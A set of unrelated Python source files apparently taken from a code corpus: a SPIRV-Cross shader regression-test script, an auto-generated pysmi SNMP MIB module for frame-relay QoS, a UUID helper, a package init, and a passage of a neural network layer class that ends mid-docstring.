#!/usr/bin/env python3 import sys import os import subprocess import tempfile import re import itertools import hashlib import shutil import argparse def parse_stats(stats): m = re.search('([0-9]+) work registers', stats) registers = int(m.group(1)) if m else 0 m = re.search('([0-9]+) uniform registers', stats) uniform_regs = int(m.group(1)) if m else 0 m_list = re.findall('(-?[0-9]+)\s+(-?[0-9]+)\s+(-?[0-9]+)', stats) alu_short = float(m_list[1][0]) if m_list else 0 ls_short = float(m_list[1][1]) if m_list else 0 tex_short = float(m_list[1][2]) if m_list else 0 alu_long = float(m_list[2][0]) if m_list else 0 ls_long = float(m_list[2][1]) if m_list else 0 tex_long = float(m_list[2][2]) if m_list else 0 return (registers, uniform_regs, alu_short, ls_short, tex_short, alu_long, ls_long, tex_long) def get_shader_type(shader): _, ext = os.path.splitext(shader) if ext == '.vert': return '--vertex' elif ext == '.frag': return '--fragment' elif ext == '.comp': return '--compute' elif ext == '.tesc': return '--tessellation_control' elif ext == '.tese': return '--tessellation_evaluation' elif ext == '.geom': return '--geometry' else: return '' def get_shader_stats(shader): f, path = tempfile.mkstemp() os.close(f) p = subprocess.Popen(['malisc', get_shader_type(shader), '--core', 'Mali-T760', '-V', shader], stdout = subprocess.PIPE, stderr = subprocess.PIPE) stdout, stderr = p.communicate() os.remove(path) if p.returncode != 0: print(stderr.decode('utf-8')) raise OSError('malisc failed') p.wait() returned = stdout.decode('utf-8') return parse_stats(returned) def validate_shader(shader, vulkan): if vulkan: subprocess.check_call(['glslangValidator', '-V', shader]) else: subprocess.check_call(['glslangValidator', shader]) def cross_compile(shader, vulkan, spirv, eliminate, invalid_spirv): spirv_f, spirv_path = tempfile.mkstemp() glsl_f, glsl_path = tempfile.mkstemp(suffix = os.path.basename(shader)) os.close(spirv_f) os.close(glsl_f) if vulkan or spirv: vulkan_glsl_f, 
vulkan_glsl_path = tempfile.mkstemp(suffix = os.path.basename(shader)) os.close(vulkan_glsl_f) if spirv: subprocess.check_call(['spirv-as', '-o', spirv_path, shader]) else: subprocess.check_call(['glslangValidator', '-V', '-o', spirv_path, shader]) if not invalid_spirv: subprocess.check_call(['spirv-val', spirv_path]) spirv_cross_path = './spirv-cross' if eliminate: subprocess.check_call([spirv_cross_path, '--remove-unused-variables', '--entry', 'main', '--output', glsl_path, spirv_path]) else: subprocess.check_call([spirv_cross_path, '--entry', 'main', '--output', glsl_path, spirv_path]) # A shader might not be possible to make valid GLSL from, skip validation for this case. if (not ('nocompat' in glsl_path)) and (not spirv): validate_shader(glsl_path, False) if vulkan or spirv: if eliminate: subprocess.check_call([spirv_cross_path, '--remove-unused-variables', '--entry', 'main', '--vulkan-semantics', '--output', vulkan_glsl_path, spirv_path]) else: subprocess.check_call([spirv_cross_path, '--entry', 'main', '--vulkan-semantics', '--output', vulkan_glsl_path, spirv_path]) validate_shader(vulkan_glsl_path, vulkan) return (spirv_path, glsl_path, vulkan_glsl_path if vulkan else None) def md5_for_file(path): md5 = hashlib.md5() with open(path, 'rb') as f: for chunk in iter(lambda: f.read(8192), b''): md5.update(chunk) return md5.digest() def make_reference_dir(path): base = os.path.dirname(path) if not os.path.exists(base): os.makedirs(base) def reference_path(directory, relpath): split_paths = os.path.split(directory) reference_dir = os.path.join(split_paths[0], 'reference/') reference_dir = os.path.join(reference_dir, split_paths[1]) return os.path.join(reference_dir, relpath) def regression_check(shader, glsl, update, keep): reference = reference_path(shader[0], shader[1]) joined_path = os.path.join(shader[0], shader[1]) print('Reference shader path:', reference) if os.path.exists(reference): if md5_for_file(glsl) != md5_for_file(reference): if update: 
print('Generated GLSL has changed for {}!'.format(reference)) # If we expect changes, update the reference file. if os.path.exists(reference): os.remove(reference) make_reference_dir(reference) shutil.move(glsl, reference) else: print('Generated GLSL in {} does not match reference {}!'.format(glsl, reference)) # Otherwise, fail the test. Keep the shader file around so we can inspect. if not keep: os.remove(glsl) sys.exit(1) else: os.remove(glsl) else: print('Found new shader {}. Placing GLSL in {}'.format(joined_path, reference)) make_reference_dir(reference) shutil.move(glsl, reference) def shader_is_vulkan(shader): return '.vk.' in shader def shader_is_desktop(shader): return '.desktop.' in shader def shader_is_eliminate_dead_variables(shader): return '.noeliminate.' not in shader def shader_is_spirv(shader): return '.asm.' in shader def shader_is_invalid_spirv(shader): return '.invalid.' in shader def test_shader(stats, shader, update, keep): joined_path = os.path.join(shader[0], shader[1]) vulkan = shader_is_vulkan(shader[1]) desktop = shader_is_desktop(shader[1]) eliminate = shader_is_eliminate_dead_variables(shader[1]) is_spirv = shader_is_spirv(shader[1]) invalid_spirv = shader_is_invalid_spirv(shader[1]) print('Testing shader:', joined_path) spirv, glsl, vulkan_glsl = cross_compile(joined_path, vulkan, is_spirv, eliminate, invalid_spirv) # Only test GLSL stats if we have a shader following GL semantics. 
if stats and (not vulkan) and (not is_spirv) and (not desktop): cross_stats = get_shader_stats(glsl) regression_check(shader, glsl, update, keep) if vulkan_glsl: regression_check((shader[0], shader[1] + '.vk'), vulkan_glsl, update, keep) os.remove(spirv) if stats and (not vulkan) and (not is_spirv) and (not desktop): pristine_stats = get_shader_stats(joined_path) a = [] a.append(shader[1]) for i in pristine_stats: a.append(str(i)) for i in cross_stats: a.append(str(i)) print(','.join(a), file = stats) def test_shaders_helper(stats, shader_dir, update, malisc, keep): for root, dirs, files in os.walk(os.path.join(shader_dir)): for i in files: path = os.path.join(root, i) relpath = os.path.relpath(path, shader_dir) test_shader(stats, (shader_dir, relpath), update, keep) def test_shaders(shader_dir, update, malisc, keep): if malisc: with open('stats.csv', 'w') as stats: print('Shader,OrigRegs,OrigUniRegs,OrigALUShort,OrigLSShort,OrigTEXShort,OrigALULong,OrigLSLong,OrigTEXLong,CrossRegs,CrossUniRegs,CrossALUShort,CrossLSShort,CrossTEXShort,CrossALULong,CrossLSLong,CrossTEXLong', file = stats) test_shaders_helper(stats, shader_dir, update, malisc, keep) else: test_shaders_helper(None, shader_dir, update, malisc, keep) def main(): parser = argparse.ArgumentParser(description = 'Script for regression testing.') parser.add_argument('folder', help = 'Folder containing shader files to test.') parser.add_argument('--update', action = 'store_true', help = 'Updates reference files if there is a mismatch. Use when legitimate changes in output is found.') parser.add_argument('--keep', action = 'store_true', help = 'Leave failed GLSL shaders on disk if they fail regression. 
Useful for debugging.') parser.add_argument('--malisc', action = 'store_true', help = 'Use malisc offline compiler to determine static cycle counts before and after spirv-cross.') args = parser.parse_args() if not args.folder: sys.stderr.write('Need shader folder.\n') sys.exit(1) test_shaders(args.folder, args.update, args.malisc, args.keep) if args.malisc: print('Stats in stats.csv!') print('Tests completed!') if __name__ == '__main__': main()
python
#
# PySNMP MIB module HPN-ICF-FR-QOS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/HPN-ICF-FR-QOS-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:26:51 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE: auto-generated pysmi output -- do not edit by hand. `mibBuilder`
# is injected into the module namespace by the PySNMP MIB loader, so this
# file is not importable as a plain Python module.

# Base ASN.1/SMI types and symbols this MIB builds on.
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
hpnicfQoS, = mibBuilder.importSymbols("HPN-ICF-OID-MIB", "hpnicfQoS")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
NotificationGroup, ModuleCompliance, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance", "ObjectGroup")
Counter32, NotificationType, Integer32, ObjectIdentity, MibIdentifier, ModuleIdentity, iso, Gauge32, Unsigned32, TimeTicks, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "NotificationType", "Integer32", "ObjectIdentity", "MibIdentifier", "ModuleIdentity", "iso", "Gauge32", "Unsigned32", "TimeTicks", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "IpAddress")
DisplayString, TextualConvention, RowStatus = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "RowStatus")

# Module identity: root OID of this MIB.
hpnicfFrQoSMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3))
if mibBuilder.loadTexts: hpnicfFrQoSMib.setLastUpdated('200407120000Z')
if mibBuilder.loadTexts: hpnicfFrQoSMib.setOrganization('')

# Textual convention: which traffic direction a CIR-allow setting applies to.
class HpnicfCirAllowDirection(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
    namedValues = NamedValues(("inbound", 1), ("outbound", 2), ("inboundAndOutbound", 3))

hpnicfFrQoSObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1))
hpnicfFrClassObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1))

# Next free FR-class index (read-only scalar).
hpnicfFrClassIndexNext = MibScalar((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpnicfFrClassIndexNext.setStatus('current')

# FR class configuration table, indexed by hpnicfFrClassIndex.
hpnicfFrClassCfgInfoTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2), )
if mibBuilder.loadTexts: hpnicfFrClassCfgInfoTable.setStatus('current')
hpnicfFrClassCfgInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfFrClassIndex"))
if mibBuilder.loadTexts: hpnicfFrClassCfgInfoEntry.setStatus('current')
hpnicfFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: hpnicfFrClassIndex.setStatus('current')
hpnicfFrClassName = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 31))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfFrClassName.setStatus('current')
hpnicfFrClassRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfFrClassRowStatus.setStatus('current')

# CIR-allow configuration table, indexed by (FR class, direction).
hpnicfCirAllowCfgInfoTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3), )
if mibBuilder.loadTexts: hpnicfCirAllowCfgInfoTable.setStatus('current')
hpnicfCirAllowCfgInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfCirAllowFrClassIndex"), (0, "HPN-ICF-FR-QOS-MIB", "hpnicfCirAllowDirection"))
if mibBuilder.loadTexts: hpnicfCirAllowCfgInfoEntry.setStatus('current')
hpnicfCirAllowFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1, 1), Integer32())
if mibBuilder.loadTexts: hpnicfCirAllowFrClassIndex.setStatus('current')
hpnicfCirAllowDirection = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1, 2), HpnicfCirAllowDirection())
if mibBuilder.loadTexts: hpnicfCirAllowDirection.setStatus('current')
hpnicfCirAllowValue = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 45000000))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfCirAllowValue.setStatus('current')
hpnicfCirAllowRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfCirAllowRowStatus.setStatus('current')

# CIR value configuration table, indexed by FR class.
hpnicfCirCfgInfoTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4), )
if mibBuilder.loadTexts: hpnicfCirCfgInfoTable.setStatus('current')
hpnicfCirCfgInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfCirFrClassIndex"))
if mibBuilder.loadTexts: hpnicfCirCfgInfoEntry.setStatus('current')
hpnicfCirFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4, 1, 1), Integer32())
if mibBuilder.loadTexts: hpnicfCirFrClassIndex.setStatus('current')
hpnicfCirValue = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1000, 45000000))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfCirValue.setStatus('current')
hpnicfCirRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfCirRowStatus.setStatus('current')

# Interface -> FR class binding table, indexed by ifIndex.
hpnicfIfApplyFrClassTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5), )
if mibBuilder.loadTexts: hpnicfIfApplyFrClassTable.setStatus('current')
hpnicfIfApplyFrClassEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfIfApplyFrClassIfIndex"))
if mibBuilder.loadTexts: hpnicfIfApplyFrClassEntry.setStatus('current')
hpnicfIfApplyFrClassIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5, 1, 1), Integer32())
if mibBuilder.loadTexts: hpnicfIfApplyFrClassIfIndex.setStatus('current')
hpnicfIfApplyFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5, 1, 2), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfIfApplyFrClassIndex.setStatus('current')
hpnicfIfApplyFrClassRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfIfApplyFrClassRowStatus.setStatus('current')

# PVC -> FR class binding table, indexed by (ifIndex, DLCI number).
hpnicfPvcApplyFrClassTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6), )
if mibBuilder.loadTexts: hpnicfPvcApplyFrClassTable.setStatus('current')
hpnicfPvcApplyFrClassEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassIfIndex"), (0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassDlciNum"))
if mibBuilder.loadTexts: hpnicfPvcApplyFrClassEntry.setStatus('current')
hpnicfPvcApplyFrClassIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1, 1), Integer32())
if mibBuilder.loadTexts: hpnicfPvcApplyFrClassIfIndex.setStatus('current')
hpnicfPvcApplyFrClassDlciNum = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(16, 1007)))
if mibBuilder.loadTexts: hpnicfPvcApplyFrClassDlciNum.setStatus('current')
hpnicfPvcApplyFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1, 3), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfPvcApplyFrClassIndex.setStatus('current')
hpnicfPvcApplyFrClassRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfPvcApplyFrClassRowStatus.setStatus('current')

# Per-PVC bandwidth table (read-only), shares the PVC table's indexes.
hpnicfFrPvcBandwidthTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 7), )
if mibBuilder.loadTexts: hpnicfFrPvcBandwidthTable.setStatus('current')
hpnicfFrPvcBandwidthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 7, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassIfIndex"), (0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassDlciNum"))
if mibBuilder.loadTexts: hpnicfFrPvcBandwidthEntry.setStatus('current')
hpnicfFrPvcBandwidthMaxReservedBW = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 7, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpnicfFrPvcBandwidthMaxReservedBW.setStatus('current')
hpnicfFrPvcBandwidthAvailable = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 7, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpnicfFrPvcBandwidthAvailable.setStatus('current')

# RTP QoS subtree.
hpnicfRTPQoSObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2))

# RTP settings applied to an FR class, indexed by FR class.
hpnicfRTPFrClassApplyTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1), )
if mibBuilder.loadTexts: hpnicfRTPFrClassApplyTable.setStatus('current')
hpnicfRTPFrClassApplyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfRTPFrClassApplyFrClassIndex"))
if mibBuilder.loadTexts: hpnicfRTPFrClassApplyEntry.setStatus('current')
hpnicfRTPFrClassApplyFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: hpnicfRTPFrClassApplyFrClassIndex.setStatus('current')
hpnicfRTPFrClassApplyStartPort = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2000, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfRTPFrClassApplyStartPort.setStatus('current')
hpnicfRTPFrClassApplyEndPort = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2000, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfRTPFrClassApplyEndPort.setStatus('current')
hpnicfRTPFrClassApplyBandWidth = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(8, 1000000))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfRTPFrClassApplyBandWidth.setStatus('current')
hpnicfRTPFrClassApplyCbs = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1500, 2000000))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfRTPFrClassApplyCbs.setStatus('current')
hpnicfRTPFrClassApplyRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 6), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hpnicfRTPFrClassApplyRowStatus.setStatus('current')

# RTP per-PVC queue runtime statistics (read-only).
hpnicfRTPFrPvcQueueRunInfoTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2), )
if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueRunInfoTable.setStatus('current')
hpnicfRTPFrPvcQueueRunInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassIfIndex"), (0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassDlciNum"))
if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueRunInfoEntry.setStatus('current')
hpnicfRTPFrPvcQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueSize.setStatus('current')
hpnicfRTPFrPvcQueueMaxSize = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueMaxSize.setStatus('current')
hpnicfRTPFrPvcQueueOutputs = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueOutputs.setStatus('current')
hpnicfRTPFrPvcQueueDiscards = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueDiscards.setStatus('current')

# Export all defined symbols so other MIB modules can import them.
mibBuilder.exportSymbols("HPN-ICF-FR-QOS-MIB", HpnicfCirAllowDirection=HpnicfCirAllowDirection, hpnicfFrClassRowStatus=hpnicfFrClassRowStatus, hpnicfPvcApplyFrClassRowStatus=hpnicfPvcApplyFrClassRowStatus, hpnicfFrPvcBandwidthTable=hpnicfFrPvcBandwidthTable, hpnicfRTPFrPvcQueueOutputs=hpnicfRTPFrPvcQueueOutputs, hpnicfFrClassIndex=hpnicfFrClassIndex, hpnicfPvcApplyFrClassIndex=hpnicfPvcApplyFrClassIndex, PYSNMP_MODULE_ID=hpnicfFrQoSMib, hpnicfIfApplyFrClassEntry=hpnicfIfApplyFrClassEntry, hpnicfRTPFrPvcQueueDiscards=hpnicfRTPFrPvcQueueDiscards, hpnicfIfApplyFrClassIfIndex=hpnicfIfApplyFrClassIfIndex, hpnicfIfApplyFrClassTable=hpnicfIfApplyFrClassTable, hpnicfCirAllowRowStatus=hpnicfCirAllowRowStatus, hpnicfIfApplyFrClassRowStatus=hpnicfIfApplyFrClassRowStatus, hpnicfRTPFrClassApplyBandWidth=hpnicfRTPFrClassApplyBandWidth, hpnicfCirAllowDirection=hpnicfCirAllowDirection, hpnicfFrPvcBandwidthMaxReservedBW=hpnicfFrPvcBandwidthMaxReservedBW, hpnicfPvcApplyFrClassIfIndex=hpnicfPvcApplyFrClassIfIndex, hpnicfRTPFrClassApplyEntry=hpnicfRTPFrClassApplyEntry, hpnicfRTPFrPvcQueueMaxSize=hpnicfRTPFrPvcQueueMaxSize, hpnicfRTPFrClassApplyCbs=hpnicfRTPFrClassApplyCbs, hpnicfPvcApplyFrClassTable=hpnicfPvcApplyFrClassTable, hpnicfRTPFrClassApplyTable=hpnicfRTPFrClassApplyTable, hpnicfRTPFrClassApplyStartPort=hpnicfRTPFrClassApplyStartPort, hpnicfFrClassCfgInfoEntry=hpnicfFrClassCfgInfoEntry, hpnicfFrPvcBandwidthAvailable=hpnicfFrPvcBandwidthAvailable, hpnicfRTPFrPvcQueueSize=hpnicfRTPFrPvcQueueSize, hpnicfRTPFrClassApplyEndPort=hpnicfRTPFrClassApplyEndPort, hpnicfRTPFrClassApplyFrClassIndex=hpnicfRTPFrClassApplyFrClassIndex, hpnicfFrClassCfgInfoTable=hpnicfFrClassCfgInfoTable, hpnicfCirAllowCfgInfoEntry=hpnicfCirAllowCfgInfoEntry, hpnicfIfApplyFrClassIndex=hpnicfIfApplyFrClassIndex, hpnicfCirRowStatus=hpnicfCirRowStatus, hpnicfFrQoSObjects=hpnicfFrQoSObjects, hpnicfRTPFrPvcQueueRunInfoTable=hpnicfRTPFrPvcQueueRunInfoTable, hpnicfCirAllowValue=hpnicfCirAllowValue, hpnicfFrQoSMib=hpnicfFrQoSMib, hpnicfCirCfgInfoEntry=hpnicfCirCfgInfoEntry, hpnicfCirAllowCfgInfoTable=hpnicfCirAllowCfgInfoTable, hpnicfCirFrClassIndex=hpnicfCirFrClassIndex, hpnicfRTPFrPvcQueueRunInfoEntry=hpnicfRTPFrPvcQueueRunInfoEntry, hpnicfFrClassIndexNext=hpnicfFrClassIndexNext, hpnicfFrPvcBandwidthEntry=hpnicfFrPvcBandwidthEntry, hpnicfPvcApplyFrClassEntry=hpnicfPvcApplyFrClassEntry, hpnicfFrClassObjects=hpnicfFrClassObjects, hpnicfCirAllowFrClassIndex=hpnicfCirAllowFrClassIndex, hpnicfRTPQoSObjects=hpnicfRTPQoSObjects, hpnicfRTPFrClassApplyRowStatus=hpnicfRTPFrClassApplyRowStatus, hpnicfCirCfgInfoTable=hpnicfCirCfgInfoTable, hpnicfCirValue=hpnicfCirValue, hpnicfPvcApplyFrClassDlciNum=hpnicfPvcApplyFrClassDlciNum, hpnicfFrClassName=hpnicfFrClassName)
python
#!/usr/bin/env python3 from uuid import UUID, uuid4 def generate_client_token(): return uuid4().hex def is_valid_uuid(uuid_string): try: UUID(uuid_string) except ValueError: return False return True
python
from .gui import * from .ui import *
python
import numpy as np
from typing import Type

from nn.activations import Activation, Sigmoid


class Layer:
    """Base class for network layers; only carries the layer dimensions."""

    # m: number of units in this layer; n: size of the connected dimension
    # (previous layer's units for HiddenLayer, batch size for Input).
    m, n = None, None


class Input(Layer):
    """Input pseudo-layer: exposes the raw mini-batch as its activation."""

    def __init__(self, n_features, batch_size):
        self.m = n_features
        self.n = batch_size
        self.cache = dict()

    def forward_step(self, x):
        """Store the batch `x` as this layer's activation.

        Assumes x has shape (n_features, batch_size) -- column-per-example,
        matching the np.dot(W, a_prev) convention used by HiddenLayer.
        """
        self.cache["A"] = x


class HiddenLayer(Layer):
    """
    Fully connected layer
    """
    activation: Type[Activation] = None
    weights = None
    bias = None
    gradients = None

    def __init__(self, prev_layer: Layer, units: int,
                 activation: Type[Activation], seed=1):
        """Create a dense layer with `units` outputs fed by `prev_layer`.

        seed -- seeds weight/bias initialization for reproducibility.
        """
        self.m = units
        self.n = prev_layer.m
        self.activation = activation
        self.prev_layer = prev_layer
        # Bug fix: `seed` was previously accepted but never used, so
        # initialization was not reproducible. A local RandomState honors
        # the seed without touching numpy's global RNG state.
        rng = np.random.RandomState(seed)
        self.weights = rng.rand(self.m, self.n)
        self.bias = rng.rand(self.m, 1)
        self.gradients = dict()
        self.cache = dict()

    def forward_step(self):
        """Compute A = activation(W . A_prev + b) and cache it."""

        def linear_product(a_prev, W, b):
            """
            Parameters
            ----------
            a_prev -- activations from previous layer (or input data):
                (size of previous layer, number of examples)
            W -- weights matrix: numpy array of shape
                (size of current layer, size of previous layer)
            b -- bias vector, numpy array of shape
                (size of the current layer, 1)

            Returns
            -------
            Z -- linear product
            """
            return np.dot(W, a_prev) + b

        a_prev = self.prev_layer.cache["A"]
        z = linear_product(a_prev, self.weights, self.bias)
        a = self.activation.activate(z)
        self.cache["A"] = a

    def backward_step(self):
        """One backpropagation step: compute dW/db and push dA upstream.

